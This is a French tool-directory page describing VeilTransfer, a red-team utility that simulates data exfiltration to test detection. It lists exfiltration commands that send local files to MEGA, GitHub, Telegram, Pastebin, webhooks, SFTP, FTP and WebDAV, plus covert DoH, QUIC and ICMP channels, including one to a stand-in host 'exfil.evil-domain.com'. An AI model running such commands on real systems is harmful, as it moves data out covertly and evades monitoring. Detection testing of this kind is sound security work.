Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
VeilTransfer — Simulateur d'exfiltration red-team utilisant MEGA, GitHub, Telegram, WebDAV, SFTP, DoH, QUIC et ICMP pour tester la détection DLP, NDR et pare-feu. | Kitploit
Outils/GitHubGitHub/infosecn1nja/veiltransfer
Exfiltration de DonnéesSécurité RéseauTests d'IntrusionRed Teaming
GitHubinfosecn1nja/veiltransfer

VeilTransfer

Simulateur d'exfiltration red-team utilisant MEGA, GitHub, Telegram, WebDAV, SFTP, DoH, QUIC et ICMP pour tester la détection DLP, NDR et pare-feu.

Voir le dépôt
15722il y a 7 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

VeilTransfer 2.0

VeilTransfer est un utilitaire d’exfiltration de données conçu pour tester et améliorer les capacités de détection. Cet outil simule des techniques d’exfiltration de données réelles utilisées par des acteurs de menace avancés, permettant aux organisations d’évaluer et d’améliorer leur posture de sécurité. En s’appuyant sur plusieurs méthodes d’exfiltration telles que MEGA, GitHub, SFTP, WebDAV, et plus encore, VeilTransfer aide à identifier les lacunes de vos défenses et garantit que vos solutions de sécurité sont prêtes à contrer les violations de données modernes.

Méthodes d’exfiltration prises en charge

  • MEGA
  • GitHub
  • Dropbox
  • Telegram
  • Pastebin
  • WebDAV
  • Webhook
  • SFTP
  • FTP
  • DoH (DNS sur HTTPS)
  • QUIC
  • ICMP

Correspondance MITRE ATT&CK

IDTechniques
T1029Transfert planifié
T1020Exfiltration automatisée
T1132.001Encodage des données : encodage standard
T1560.002Archivage des données collectées : archivage via bibliothèque
T1567.001Exfiltration via un service web : exfiltration vers un dépôt de code
T1567.002Exfiltration via un service web : exfiltration vers un stockage cloud
T1567.003Exfiltration via un service web : exfiltration vers un stockage de texte
T1567.004Exfiltration via un service web : exfiltration via un webhook
T1048.003Exfiltration via un protocole alternatif : exfiltration via un protocole non-C2 non chiffré
T1048.002Exfiltration via un protocole alternatif : exfiltration via un protocole non-C2 à chiffrement asymétrique

Fonctionnalités supplémentaires

Génération de fausses données

VeilTransfer prend également en charge la génération de fausses données, notamment :

  • Numéros de carte d’identité indonésienne (KTP) : Générez des numéros KTP réalistes et les données associées.
  • Informations de carte bancaire : Créez de faux détails de carte bancaire au format PCI DSS, comprenant le prénom, le nom, le CCN (Visa/MasterCard/AMEX) et la date d’expiration.
  • Numéros de sécurité sociale (SSN) : Générez de faux SSN pour une utilisation dans des environnements de simulation et de test.
  • Dossiers médicaux : Générez de fausses données de dossiers médicaux en indonésien (id) ou en anglais (en).

Création de données Zip

Créez facilement des fichiers zip pour regrouper et compresser des données, qui peuvent ensuite être utilisés pour l’exfiltration ou pour tester différents scénarios. Prend en charge le découpage facultatif en plusieurs fichiers selon la taille.

Exemples d’utilisation

  • Opérations Red Team : Déployez VeilTransfer lors d’exercices red team pour mettre au défi les blue teams avec des scénarios d’exfiltration sophistiqués et réalistes.
  • Purple Teaming : Collaborez avec vos équipes défensives pour simuler puis détecter les tentatives d’exfiltration, en affinant les tactiques offensives et défensives.
  • Tests de sécurité : Utilisez VeilTransfer pour valider l’efficacité des mesures DLP, NDR, pare-feu et autres mesures de sécurité réseau.

Exemple d’utilisation

Transfert

Transférer un fichier via SFTP

Cet exemple montre comment transférer de manière sécurisée un fichier vers un serveur distant à l’aide du protocole SFTP. Le fichier se trouve sur la machine locale et est transféré vers le répertoire distant spécifié à l’aide de l’authentification SSH.

root@kitploit:~
veiltransfer_client transfer sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass

Transférer des fichiers vers un serveur WebDAV

Dans cet exemple, les fichiers d’un répertoire local sont téléversés vers un serveur WebDAV. Le serveur requiert un nom d’utilisateur et un mot de passe pour l’authentification. Le paramètre serveur inclut le schéma d’URI (https:// ou http://).

root@kitploit:~
veiltransfer_client transfer webdav -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass

Transférer des fichiers vers Mega Cloud

Cet exemple montre comment transférer des fichiers vers le stockage Mega Cloud. Les fichiers sont téléversés depuis un répertoire local spécifié, et l’authentification est gérée à l’aide des identifiants Mega Cloud de l’utilisateur.

root@kitploit:~
veiltransfer_client transfer mega -localPath (/path/to/file or /path/to/directory) -username [email protected] -password megasecretpassword

Transférer des fichiers via FTP

Dans cet exemple, un fichier est téléversé vers un serveur FTP. Le fichier est transféré vers un répertoire spécifique sur le serveur distant. Le serveur requiert un nom d’utilisateur et un mot de passe pour l’authentification.

root@kitploit:~
veiltransfer_client transfer ftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword

Téléverser un fichier sur Pastebin

Cet exemple montre comment téléverser le contenu d’un fichier sur Pastebin. Le contenu est publié sur Pastebin à l’aide d’une clé API fournie par l’utilisateur.

root@kitploit:~
veiltransfer_client transfer pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key

Envoyer un fichier vers un dépôt GitHub

Cet exemple montre comment envoyer un fichier depuis la machine locale vers un dépôt GitHub spécifique. Le fichier est ajouté au dépôt à l’aide du jeton API GitHub de l’utilisateur pour l’authentification.

root@kitploit:~
veiltransfer_client transfer github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token

Envoyer un fichier vers un canal Telegram

Cet exemple montre comment envoyer un fichier vers un canal Telegram spécifique. Le fichier est envoyé à l’aide d’un jeton API de bot Telegram, et le message est délivré à l’identifiant de canal spécifié.

root@kitploit:~
veiltransfer_client transfer telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789

Envoyer des données vers une URL de webhook

Dans cet exemple, le contenu d’un fichier est envoyé vers une URL de webhook spécifiée.

root@kitploit:~
veiltransfer_client transfer webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url

Transférer des fichiers via DoH (DNS sur HTTPS)

Pour établir un mécanisme sécurisé d’exfiltration de données utilisant DNS sur HTTPS (DoH), les enregistrements DNS suivants doivent être configurés :

  1. Enregistrement A : Faites pointer test vers l’adresse IP <VeilTransfer_IP_Address>.

    test -> <VeilTransfer_IP_Address>

  2. Enregistrement NS : Définissez un sous-domaine (exfil) géré par evil-domain.com.

    exfil -> test.evil-domain.com

Le domaine exfil.evil-domain.com servira de domaine DNS Exfil.

Ensuite, démarrez le serveur VeilTransfer en mode DoH avec la commande suivante :

root@kitploit:~
veiltransfer_server doh -key ag36rjsg284nfk2g -folder /root/data/exfil

Remarque : La clé de chiffrement (-key) doit comporter 16 ou 32 caractères.

Pour téléverser des fichiers via DoH, assurez-vous que le serveur VeilTransfer est bien en cours d’exécution en mode DoH avec une clé de chiffrement valide. Lancez ensuite le transfert à l’aide de la commande cliente :

root@kitploit:~
veiltransfer_client transfer doh -localPath /path/to/file_or_directory -key ag36rjsg284nfk2g -dnsServer exfil.evil-domain.com

Transférer des fichiers via QUIC

Pour démarrer le serveur VeilTransfer en mode QUIC, utilisez la commande suivante :

root@kitploit:~
veiltransfer_server quic -cert /path/server.crt -key /path/server.key

Une fois le serveur en cours d’exécution, vous pouvez téléverser des fichiers ou des répertoires en utilisant :

root@kitploit:~
veiltransfer_client transfer quic -localPath (/path/to/file or /path/to/directory) -server example.com:443

Transférer des fichiers via ICMP

Pour activer les transferts de fichiers via le protocole ICMP, démarrez le serveur VeilTransfer en mode ICMP en exécutant la commande suivante :

root@kitploit:~
veiltransfer_server_linux icmp -folder /path/folder

Une fois le serveur actif, exécutez la commande suivante pour transférer des fichiers ou des répertoires via ICMP :

root@kitploit:~
veiltransfer_client_linux transfer icmp -localPath (/path/to/file or /path/to/directory) -server <ip address>

Créer des fichiers Zip

Créer un fichier Zip simple

Crée une archive zip à partir d’un répertoire spécifié.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip

Créer un fichier Zip divisé

Crée une archive zip divisée en plusieurs parties selon la taille spécifiée.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000

Générateur de données

Générer 100 faux numéros de carte bancaire

Cet exemple montre comment générer 100 entrées de fausses données de carte bancaire. Les données générées incluront les numéros de carte bancaire, les dates d’expiration et les détails associés.

root@kitploit:~
veiltransfer_client generate-fake -ccn -count 100

Générer 50 fausses entrées KTP indonésiennes

Cet exemple montre comment générer 50 entrées de fausses données KTP, qui sont des cartes d’identité indonésiennes. Les données incluent des informations personnelles telles que le nom, l’adresse et le numéro KTP.

root@kitploit:~
veiltransfer_client generate-fake -ktp -count 50

Générer 200 faux numéros de sécurité sociale

Les données générées incluent des numéros de sécurité sociale formatés selon les normes américaines.

root@kitploit:~
veiltransfer_client generate-fake -ssn -count 200

Générer 300 faux dossiers médicaux en anglais

Cet exemple montre comment générer 300 faux dossiers médicaux en anglais.

root@kitploit:~
veiltransfer_client generate-fake -medical-record -count 300 -language en

Contribution

Les contributions à VeilTransfer sont les bienvenues ! Si vous avez des idées de nouvelles fonctionnalités, de méthodes d’exfiltration ou d’améliorations, veuillez soumettre une pull request ou ouvrir une issue sur GitHub.

Télécharger l’outil